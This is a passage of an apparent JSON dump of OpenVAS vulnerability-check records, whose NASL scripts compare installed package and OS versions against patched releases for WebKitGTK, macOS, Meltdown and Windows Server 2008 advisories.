a specially crafted website, an attacker could potentially exploit these to\n cause a denial of service, spoof the user interface, or execute arbitrary code.\n (CVE-2018-4088, CVE-2018-4096, CVE-2017-7153, CVE-2017-7160, CVE-2017-7161,\n CVE-2017-7165, CVE-2017-13884, CVE-2017-13885)\");\n script_tag(name:\"affected\", value:\"webkit2gtk on Ubuntu 17.10,\n Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3551-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3551-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(17\\.10|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU17.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18:amd64\", ver:\"2.18.6-0ubuntu0.17.10.1\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18:i386\", ver:\"2.18.6-0ubuntu0.17.10.1\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37:amd64\", ver:\"2.18.6-0ubuntu0.17.10.1\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37:i386\", ver:\"2.18.6-0ubuntu0.17.10.1\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18:amd64\", ver:\"2.18.6-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18:i386\", ver:\"2.18.6-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37:amd64\", ver:\"2.18.6-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37:i386\", ver:\"2.18.6-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:59", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-02-03T00:00:00", "type": "openvas", "title": "Fedora Update for webkitgtk4 FEDORA-2018-43712163de", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-7161", "CVE-2017-7165", "CVE-2017-7153", "CVE-2017-7160", "CVE-2017-13884", "CVE-2018-4088", "CVE-2018-4096", "CVE-2017-13885"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874088", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874088", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_43712163de_webkitgtk4_fc26.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for webkitgtk4 FEDORA-2018-43712163de\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874088\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-02-03 07:50:59 +0100 (Sat, 03 Feb 2018)\");\n script_cve_id(\"CVE-2018-4088\", \"CVE-2017-13885\", \"CVE-2017-7165\",\n \"CVE-2017-13884\", \"CVE-2017-7160\", \"CVE-2017-7153\", \"CVE-2017-7161\",\n \"CVE-2018-4096\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for webkitgtk4 FEDORA-2018-43712163de\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkitgtk4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"webkitgtk4 on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"FEDORA\", value:\"2018-43712163de\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KWKKPQBMNY3CM2C5DPUKJQX5ITUAD4HC\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"webkitgtk4\", rpm:\"webkitgtk4~2.18.6~1.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:07", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-01-29T00:00:00", "type": "openvas", "title": "Fedora Update for webkitgtk4 FEDORA-2018-3199135a7e", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-7161", "CVE-2017-7165", "CVE-2017-7153", "CVE-2017-7160", "CVE-2017-13884", "CVE-2018-4088", "CVE-2018-4096", "CVE-2017-13885"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874059", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874059", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_3199135a7e_webkitgtk4_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for webkitgtk4 FEDORA-2018-3199135a7e\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874059\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-01-29 07:50:21 +0100 (Mon, 29 Jan 2018)\");\n script_cve_id(\"CVE-2018-4088\", \"CVE-2017-13885\", \"CVE-2017-7165\",\n \"CVE-2017-13884\", \"CVE-2017-7160\", \"CVE-2017-7153\", \"CVE-2017-7161\",\n \"CVE-2018-4096\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for webkitgtk4 FEDORA-2018-3199135a7e\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkitgtk4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"webkitgtk4 on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"FEDORA\", value:\"2018-3199135a7e\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KWUXL4ATBJKWKT5ABIGAYICHPARJJPHW\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"webkitgtk4\", rpm:\"webkitgtk4~2.18.6~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-17T14:22:47", "description": "This host is installed with Apple Mac OS X\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2017-12-07T00:00:00", "type": "openvas", "title": "Apple MacOSX Security Updates(HT208331, HT208394)-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5754", "CVE-2017-7155", "CVE-2017-13871", "CVE-2017-13865", "CVE-2017-13860", "CVE-2017-13858", "CVE-2017-13878", "CVE-2017-7171", "CVE-2017-13876", "CVE-2017-7163", "CVE-2017-13872", "CVE-2017-13883", "CVE-2017-13848", "CVE-2017-13875"], "modified": "2019-07-05T00:00:00", "id": "OPENVAS:1361412562310812400", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812400", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple MacOSX Security Updates(HT208331, HT208394)-01\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812400\");\n script_version(\"2019-07-05T09:12:25+0000\");\n script_cve_id(\"CVE-2017-13872\", \"CVE-2017-5754\", \"CVE-2017-13860\", \"CVE-2017-13871\",\n \"CVE-2017-13865\", \"CVE-2017-13876\", \"CVE-2017-13848\", \"CVE-2017-13858\",\n \"CVE-2017-13875\", \"CVE-2017-13878\", \"CVE-2017-13883\", \"CVE-2017-7163\",\n \"CVE-2017-7155\", \"CVE-2017-7171\");\n script_bugtraq_id(101981, 102378, 102097, 102099, 102100);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 09:12:25 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-12-07 10:51:33 +0530 (Thu, 07 Dec 2017)\");\n script_name(\"Apple MacOSX Security Updates(HT208331, HT208394)-01\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple Mac OS X\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The Security update resolves, a logic error\n existed in the validation of credentials, an encryption issue existed with S/MIME\n credentials, an inconsistent user interface issue and an error in systems with\n microprocessors utilizing speculative execution, memory corruption issue,\n input validation issue existed in the kernel, an out-of-bounds read error and\n indirect branch prediction.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code with kernel and system privileges. Also\n attacker may be able to bypass administrator authentication without supplying\n the administrator's password and also allow unauthorized disclosure of\n information to an attacker with local user access via a side-channel analysis\n of the data cache and can cause unexpected system termination.\");\n\n script_tag(name:\"affected\", value:\"Apple Mac OS X versions, 10.13.x through 10.13.1\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple Mac OS X 10.13.2 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT208331\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT208394\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\", re:\"ssh/login/osx_version=^10\\.13\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName)\n exit(0);\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer || osVer !~ \"^10\\.13\" || \"Mac OS X\" >!< osName){\n exit(0);\n}\n\nif(version_in_range(version:osVer, test_version:\"10.13\", test_version2:\"10.13.1\"))\n{\n report = report_fixed_ver(installed_version:osVer, fixed_version:\"10.13.2\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:35:34", "description": "This host is missing an important security\n update according to Microsoft KB4042723.", "cvss3": {}, "published": "2017-11-10T00:00:00", "type": "openvas", "title": "Windows Server 2008 Defense in Depth (KB4042723)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-13080"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811950", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811950", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Windows Server 2008 Defense in Depth (KB4042723)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811950\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-13080\");\n script_tag(name:\"cvss_base\", value:\"2.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-11-10 18:23:04 +0530 (Fri, 10 Nov 2017)\");\n script_name(\"Windows Server 2008 Defense in Depth (KB4042723)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB4042723.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Microsoft has released an update for\n Microsoft Windows Server 2008 that provides enhanced security as a\n defense-in-depth measure.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n attackers to compromise integrity, availability, and confidentiality of the\n system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows Server 2008 x32/x64 Edition Service Pack 2.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4042723\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\", \"gb_wmi_access.nasl\");\n script_mandatory_keys(\"WMI/access_successful\", \"SMB/WindowsVersion\");\n script_exclude_keys(\"win/lsc/disable_wmi_search\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"wmi_file.inc\");\n\nif( hotfix_check_sp( win2008:3, win2008x64:3 ) <= 0 ) {\n exit( 0 );\n}\n\ninfos = kb_smb_wmi_connectinfo();\nif( ! infos ) exit( 0 );\n\nhandle = wmi_connect( host:infos[\"host\"], username:infos[\"username_wmi_smb\"], password:infos[\"password\"] );\nif( ! handle ) exit( 0 );\n\n# TODO: Limit to a possible known common path\nfileList = wmi_file_fileversion( handle:handle, fileName:\"nwifi\", fileExtn:\"sys\", includeHeader:FALSE );\nwmi_close( wmi_handle:handle );\nif( ! fileList || ! is_array( fileList ) ) {\n exit( 0 );\n}\n\n# Don't pass NULL to version functions below\nmaxVer = \"unknown\";\n\nforeach filePath( keys( fileList ) ) {\n\n vers = fileList[filePath];\n\n if( vers && version = eregmatch( string:vers, pattern:\"^([0-9.]+)\" ) ) {\n\n if( version_is_less( version:version[1], test_version:maxVer ) ) {\n continue;\n } else {\n foundMax = TRUE;\n maxVer = version[1];\n maxPath = filePath;\n }\n }\n}\n\nif( foundMax ) {\n if(version_is_less( version:maxVer, test_version:\"6.0.6002.24202\" ) ) {\n report = report_fixed_ver( file_checked:maxPath, file_version:maxVer, vulnerable_range:\"Less than 6.0.6002.24202\" );\n security_message( port:0, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 2.9, "vector": "AV:A/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:33:20", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-01-11T00:00:00", "type": "openvas", "title": "Ubuntu Update for linux-lts-xenial USN-3522-4", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5754"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310843415", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843415", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3522_4.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux-lts-xenial USN-3522-4\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843415\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-01-11 07:38:38 +0100 (Thu, 11 Jan 2018)\");\n script_cve_id(\"CVE-2017-5754\");\n script_tag(name:\"cvss_base\", value:\"4.7\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-lts-xenial USN-3522-4\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-lts-xenial'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"USN-3522-2 fixed a vulnerability in the\n Linux Hardware Enablement kernel for Ubuntu 14.04 LTS to address Meltdown\n (CVE-2017-5754). Unfortunately, that update introduced a regression where a few\n systems failed to boot successfully. This update fixes the problem. We apologize\n for the inconvenience. Original advisory details: Jann Horn discovered that\n microprocessors utilizing speculative execution and indirect branch prediction\n may allow unauthorized memory reads via sidechannel attacks. This flaw is known\n as Meltdown. A local attacker could use this to expose sensitive information,\n including kernel memory.\");\n script_tag(name:\"affected\", value:\"linux-lts-xenial on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3522-4\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3522-4/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-109-generic\", ver:\"4.4.0-109.132~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-109-lowlatency\", ver:\"4.4.0-109.132~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lts-xenial\", ver:\"4.4.0.109.92\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency-lts-xenial\", ver:\"4.4.0.109.92\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-07-17T14:04:13", "description": "This host is running Apple Mac OS X and\n is prone to an information disclosure vulnerability.", "cvss3": {}, "published": "2018-01-24T00:00:00", "type": "openvas", "title": "Apple Mac OS X Speculative Execution Side-Channel Vulnerability-Meltdown (HT208465)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5754"], "modified": "2019-07-05T00:00:00", "id": "OPENVAS:1361412562310812662", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812662", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple Mac OS X Speculative Execution Side-Channel Vulnerability-Meltdown (HT208465)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812662\");\n script_version(\"2019-07-05T09:12:25+0000\");\n script_cve_id(\"CVE-2017-5754\");\n script_bugtraq_id(102378);\n script_tag(name:\"cvss_base\", value:\"4.7\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 09:12:25 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-01-24 10:47:13 +0530 (Wed, 24 Jan 2018)\");\n script_name(\"Apple Mac OS X Speculative Execution Side-Channel Vulnerability-Meltdown (HT208465)\");\n\n script_tag(name:\"summary\", value:\"This host is running Apple Mac OS X and\n is prone to an information disclosure vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists as systems with\n microprocessors utilizing speculative execution and indirect branch prediction\n may allow unauthorized disclosure of information to an attacker with local user\n access via a side-channel analysis of the data cache.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to read kernel memory (Meltdown).\");\n\n script_tag(name:\"affected\", value:\"Apple Mac OS X version 10.12.x through\n 10.12.6 before build 16G1212 and 10.11.x through 10.11.6 before build 15G19009.\");\n\n script_tag(name:\"solution\", value:\"Apply the supplemental update from the vendor.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT208465\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\", re:\"ssh/login/osx_version=^10\\.1[12]\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName || \"Mac OS X\" >!< osName){\n exit(0);\n}\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer || osVer !~ \"^10\\.1[12]\"){\n exit(0);\n}\n\nif(version_in_range(version:osVer, test_version:\"10.11\", test_version2:\"10.11.5\") ||\n version_in_range(version:osVer, test_version:\"10.12\", test_version2:\"10.12.5\")){\n fix = \"Upgrade to latest OS release and apply patch from vendor\";\n }\n\nelse if(osVer == \"10.11.6\" || osVer == \"10.12.6\")\n{\n buildVer = get_kb_item(\"ssh/login/osx_build\");\n if(buildVer)\n {\n ##https://en.wikipedia.org/wiki/MacOS_Sierra\n ##https://en.wikipedia.org/wiki/OS_X_El_Capitan\n if((osVer == \"10.11.6\" && version_is_less(version:buildVer, test_version:\"15G19009\")) ||\n (osVer == \"10.12.6\" && version_is_less(version:buildVer, test_version:\"16G1212\")))\n {\n fix = \"Apply patch from vendor\";\n osVer = osVer + \" Build \" + buildVer;\n }\n }\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:osVer, fixed_version:fix);\n security_message(data:report);\n 